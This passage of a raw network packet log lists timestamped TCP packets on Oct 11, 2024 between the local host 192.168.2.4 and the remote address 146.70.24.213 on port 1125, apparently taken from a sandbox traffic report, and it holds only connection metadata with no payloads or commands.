Oct 11, 2024 16:53:47.877043962 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877053022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877063990 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877068996 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877074957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877084970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877095938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877104998 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877105951 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877119064 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877127886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877140045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877142906 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877151966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877161980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877162933 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877180099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877182007 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877192020 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877211094 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877226114 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877238035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877250910 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877254963 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877269030 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877286911 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877312899 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877357006 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877367973 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877373934 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877383947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877394915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877419949 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877438068 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877449036 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877492905 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877532005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877545118 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877587080 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877598047 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877609968 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877612114 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877619982 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877629995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877638102 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877643108 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877654076 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877661943 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877665997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877679110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877690077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877696991 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877720118 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877729893 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877813101 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877844095 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877892017 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.877918005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877968073 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.877979994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878010988 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.878031969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878042936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878055096 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878074884 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878079891 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.878087997 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878098965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878109932 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.878153086 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.878180981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878199100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878212929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878223896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878230095 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.878236055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.878249884 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.878277063 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.965677977 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.965718985 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.965728998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.965775013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.965785980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.965796947 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.965807915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.965820074 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.965866089 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966160059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966171980 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966183901 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966201067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966202974 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966213942 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966224909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966229916 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966253042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966259956 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966295958 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966330051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966341972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966357946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966368914 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966379881 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966382980 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966392040 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966403961 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966403961 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966418028 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966427088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966429949 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966456890 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966516972 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966527939 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966540098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966550112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966561079 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966562986 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966574907 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966604948 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966860056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966878891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966888905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966918945 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.966960907 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966979027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.966989994 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967000008 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967004061 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967024088 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967096090 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967107058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967117071 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967128038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967137098 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967138052 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967156887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967185974 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967293024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967317104 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967328072 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967338085 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967348099 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967355013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967358112 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967369080 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967370987 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967387915 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967408895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967411995 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967418909 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967430115 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967436075 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967451096 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967453957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967466116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967488050 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967506886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967519045 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967529058 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967540026 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967550993 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967550993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967577934 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967583895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967592001 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967892885 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967905998 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967917919 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967928886 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967936993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967940092 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967952013 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.967952013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967964888 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.967981100 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968002081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968041897 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968054056 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968065023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968075037 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968086004 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968102932 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968117952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968128920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968128920 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968139887 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968149900 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968157053 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968173981 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968184948 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968189955 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968197107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968208075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968213081 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968219042 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968230009 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968240023 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968240023 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968269110 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968288898 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968478918 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968491077 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968501091 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968518019 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968528032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968528986 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968539000 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968550920 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968556881 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968566895 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968578100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968579054 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968589067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968600035 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968606949 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968611002 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968621969 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968628883 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968632936 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968648911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968648911 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968660116 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968671083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968677044 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968682051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968694925 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968708992 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968720913 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968791962 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968803883 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968815088 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968825102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968830109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968837976 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968848944 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968849897 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968859911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968878984 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968899012 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.968914032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968924999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968935966 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.968971014 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.969012022 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.969022989 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.969033957 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.969043970 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.969048023 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.969054937 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:47.969075918 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:47.969104052 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057183027 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057197094 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057208061 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057218075 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057226896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057243109 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057249069 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057260990 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057265043 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057281017 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057286024 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057292938 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057302952 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057312965 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057317019 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057322979 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057332993 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057333946 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057346106 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057356119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057363987 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057364941 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057375908 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057380915 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057388067 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057404041 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057404995 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057416916 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057420969 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057426929 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057449102 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057460070 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057468891 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057473898 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057478905 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057486057 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057490110 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057503939 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057507992 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057518005 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057535887 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057555914 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057625055 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057733059 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057742119 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057751894 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057763100 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057774067 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057786942 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057872057 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057883024 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057893038 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057902098 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057909966 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057913065 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057923079 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057924032 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057934999 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057945013 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057951927 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057971954 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.057979107 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057988882 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.057998896 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058015108 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058029890 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058067083 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058078051 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058109045 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058403015 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058413029 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058423996 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058450937 CEST	49730	1125	192.168.2.4	146.70.24.213
Oct 11, 2024 16:53:48.058466911 CEST	1125	49730	146.70.24.213	192.168.2.4
Oct 11, 2024 16:53:48.058476925 CEST	1125	49730	146.70.24.213	192.168.2.4
